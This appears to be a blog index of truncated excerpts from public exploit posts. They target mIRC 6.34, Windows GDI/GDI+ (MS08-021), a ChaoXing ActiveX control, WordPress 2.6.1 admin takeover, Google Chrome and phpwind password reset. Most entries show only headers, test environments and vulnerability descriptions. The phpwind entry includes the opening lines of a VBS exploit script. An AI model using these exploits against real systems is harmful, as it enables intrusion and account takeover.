#!/usr/bin/perl
#
#
# mIRC 6.34 Remote Buffer Overflow Exploit
# Exploit by SkD (skdrat <at> hotmail <.> com)
# —————————————-
# A day’s work of debugging and looking at mIRC.
#
# Tested on Windows XP SP3 English and Windows Vista SP0.
#
# Credits to securfrog for publishing the PoC.
#
# Author has no responsibility over the damage you do with this!
#
# Note: You might change the addresses for Vista ;)
#
# —————————————-
阅读全文 »
Tags: Exploit,
mIRC
EMR_COLORMATCHTOTARGETW stack buffer overflow exploit
By Ac!dDrop
This is one of the 2 Vulnerabilities of MS08-021
Tested on Windows xp professional SP1
GDi32.dll 5.1.2600.1106
kernel32.dll 5.1.2600.1106
ws2_32.dll 5.1.2600.0
阅读全文 »
Tags: Exploit,
GDI+,
MS08-021
MS Windows GDI+ .ico Remote Division By Zero
Application: GDIPLUS.DLL
Web Site: http://www.microsoft.com/
Platform: Windows *
Bug: Division By Zero
Tested agains: XP SP3 fully patched
Note: This have nothing to do with http://milw0rm.com/exploits/4044
——————————————————-
阅读全文 »
Tags: Exploit,
GDI+,
GdiPlus.dll
文章作者:friddy
信息来源:邪恶八进制信息安全团队(www.eviloctal.com)
注:文章首发Friddy的罐子,后由原创作者友情提交到邪恶八进制信息安全团队讨论组,转载请著名首发站点。
本文章只含有漏洞存在的证明,效果是运行计算器的程序,不含有攻击性代码!
去年11月出的漏洞是在target.Register(ok,buffer)上,这次的缓冲区溢出出在target.LoadPage(buffer ,1 ,1 ,1)
漏洞位置:clsid:7F5E27CE-4A5C-11D3-9232-0000B48A05B2的LoadPage函数发生缓冲区溢出
漏洞告警: ACCESS_VIOLATION
Disasm: 41414141 ????? ()
阅读全文 »
Tags: 0day,
Exploit,
超星
#!/usr/bin/php
<?php
# ————————————————————
# quick’n’dirty wordpress admin-take0ver poc
# by iso^kpsbr in august 2oo8
#
# works w/ wordpress 2.6.1
#
# .oO( private — do not spread! )Oo.
#
# you’ll have to make sure you run roughly the same
# php version as on the server, that is: if server
# is >=5.2.1 you’ll need to be as well, in case
# server is <5.2.1, your php also needs to be below.
# to make sure it works you’ll need the exact same version!
# also, mod_php works better than (f)cgi..
# (this is a first working version – not a very reliable one)
阅读全文 »
Tags: Exploit,
SQL Column Truncation,
WordPress
PoC Code is in Attach file because this file is saved in ‘Unicode’ type for exploit.
Here is Description for this Vuln :
· Type of Issue : Buffer Overflow.
· Affected Software : Google Chrome 0.2.149.27.
· Exploitation Environment : Google Chrome (Language: Vietnamese) on Windows XP SP2.
· Impact: Remote code execution.
· Rating : Critical .
· Description :
阅读全文 »
Tags: Exploit,
Google Chrome
Author: nerex
E-mail: nerex[at]live[dot]com
Google’s new Web browser (Chrome) allows files (e.g., executables) to be automatically
downloaded to the user’s computer without any user prompt.
This proof-of-concept was created for educational purposes only.
Use the code it at your own risk.
The author will not be responsible for any damages.
阅读全文 »
Tags: Exploit,
Google Chrome
作者:Tr4c3
‘phpwind任意修改管理员密码漏洞 VBS版利用程序 By Tr4c3
Dim strUrl, strPost, xPost, strGet
Set Args = Wscript.Arguments
If Args.count<>2 Then
Wscript.Echo “Usage: ” & Wscript.ScriptName & ” http://hi.baidu.com/tr4c3/ 1″
Wscript.Quit
Else
strUrl = Args(0) & “wap/index.php”
阅读全文 »
Tags: Exploit,
PHPWind,
VBS